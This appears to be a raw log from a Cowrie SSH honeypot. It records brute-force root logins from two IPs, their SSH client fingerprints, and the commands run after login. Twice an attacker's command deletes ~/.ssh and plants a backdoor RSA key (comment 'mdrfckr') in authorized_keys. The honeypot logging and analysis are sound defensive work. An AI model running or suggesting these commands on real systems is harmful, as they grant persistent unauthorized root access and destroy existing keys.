{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:26:00.139670Z","src_ip":"212.227.235.229","session":"ae8337b7d611"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:26:00.847122Z","src_ip":"212.227.235.229","session":"ae8337b7d611"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:26:01.015581Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:26:01.016588Z","src_ip":"212.227.235.229","session":"ae8337b7d611"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1123,"dst_ip":"1.2.3.4","dst_port":22,"session":"7997b412624e","protocol":"ssh","message":"New connection: 212.227.235.229:1123 (1.2.3.4:22) [session: 7997b412624e]","sensor":"my-vps","timestamp":"2025-08-26T23:26:40.006068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:26:40.007515Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:26:40.294170Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.login.success","username":"root","password":"zhuzhu123","message":"login attempt [root/zhuzhu123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:26:41.481261Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:26:42.074778Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:26:42.075531Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:26:42.076715Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:26:42.368180Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:26:43.046859Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T23:26:43.047585Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T23:26:43.336516Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:26:43.337597Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33739,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef4a3123a490","protocol":"ssh","message":"New connection: 212.227.235.229:33739 (1.2.3.4:22) [session: ef4a3123a490]","sensor":"my-vps","timestamp":"2025-08-26T23:26:43.623907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:26:43.624535Z","src_ip":"212.227.235.229","session":"ef4a3123a490"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:26:43.912879Z","src_ip":"212.227.235.229","session":"ef4a3123a490"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T23:26:45.107320Z","src_ip":"212.227.235.229","session":"ef4a3123a490"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:26:46.398558Z","src_ip":"212.227.235.229","session":"ef4a3123a490"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17618,"dst_ip":"1.2.3.4","dst_port":22,"session":"323c511d9c15","protocol":"ssh","message":"New connection: 212.227.235.229:17618 (1.2.3.4:22) [session: 323c511d9c15]","sensor":"my-vps","timestamp":"2025-08-26T23:26:46.684022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:26:46.685059Z","src_ip":"212.227.235.229","session":"323c511d9c15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:26:46.971257Z","src_ip":"212.227.235.229","session":"323c511d9c15"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:26:48.159236Z","src_ip":"212.227.235.229","session":"323c511d9c15"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:26:48.447339Z","src_ip":"212.227.235.229","session":"7997b412624e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:26:48.448157Z","src_ip":"212.227.235.229","session":"323c511d9c15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59572,"dst_ip":"1.2.3.4","dst_port":22,"session":"a505d514bb2d","protocol":"ssh","message":"New connection: 212.227.235.229:59572 (1.2.3.4:22) [session: a505d514bb2d]","sensor":"my-vps","timestamp":"2025-08-26T23:27:13.518718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:27:14.904310Z","src_ip":"212.227.235.229","session":"a505d514bb2d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:27:14.927257Z","src_ip":"212.227.235.229","session":"a505d514bb2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56746,"dst_ip":"1.2.3.4","dst_port":22,"session":"f676ac6a2c4e","protocol":"ssh","message":"New connection: 212.227.125.160:56746 (1.2.3.4:22) [session: f676ac6a2c4e]","sensor":"my-vps","timestamp":"2025-08-26T23:27:22.321380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:27:22.322289Z","src_ip":"212.227.125.160","session":"f676ac6a2c4e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T23:27:22.447346Z","src_ip":"212.227.125.160","session":"f676ac6a2c4e"}
{"eventid":"cowrie.login.success","username":"root","password":"1qw23er45t","message":"login attempt [root/1qw23er45t] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:27:22.824764Z","src_ip":"212.227.125.160","session":"f676ac6a2c4e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:27:23.143903Z","src_ip":"212.227.125.160","session":"f676ac6a2c4e"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-26T23:27:23.144614Z","src_ip":"212.227.125.160","session":"f676ac6a2c4e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:27:23.274657Z","src_ip":"212.227.125.160","session":"f676ac6a2c4e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:27:23.276471Z","src_ip":"212.227.125.160","session":"f676ac6a2c4e"}
{"eventid":"cowrie.login.failed","username":"test","password":"123qwe","message":"login attempt [test/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T23:27:23.389553Z","src_ip":"212.227.235.229","session":"a505d514bb2d"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:27:25.866575Z","src_ip":"212.227.235.229","session":"a505d514bb2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38634,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee2a89038492","protocol":"ssh","message":"New connection: 212.227.235.229:38634 (1.2.3.4:22) [session: ee2a89038492]","sensor":"my-vps","timestamp":"2025-08-26T23:27:28.756896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:27:28.757767Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:27:28.971600Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz2WSX","message":"login attempt [root/!qaz2WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:27:29.869684Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:27:30.315139Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:27:30.315872Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:27:30.317303Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:27:30.532197Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:27:31.075191Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T23:27:31.075866Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T23:27:31.291626Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:27:31.292610Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
